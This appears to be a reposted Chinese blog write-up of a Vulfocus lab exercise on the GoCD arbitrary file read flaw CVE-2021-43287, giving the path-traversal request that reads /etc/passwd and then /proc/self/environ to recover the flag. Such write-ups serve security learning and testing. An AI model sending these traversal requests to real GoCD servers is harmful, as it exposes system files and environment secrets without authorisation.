其他分享
首页 > 其他分享> > Vulfocus靶场 | GoCD 任意文件读取漏洞 (CVE-2021-43287)

Vulfocus靶场 | GoCD 任意文件读取漏洞 (CVE-2021-43287)

作者:互联网

漏洞描述

GoCD 一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。

漏洞复现

通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取  

 

 

点击会自动下载一个文件

 

flag:

因为找个漏洞是任意文件读取

但是这个靶场中flag是在tmp目录下,也没办法查看目录下的文件

/proc/self/environ是Linux系统下的环境变量文件,用于保存系统的一些变量。

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../proc/self/environ

 

 

 

标签:文件,读取,..,Vulfocus,GoCD,漏洞,2021,Go,ThoughtWorks
来源: https://www.cnblogs.com/mlxwl/p/16608969.html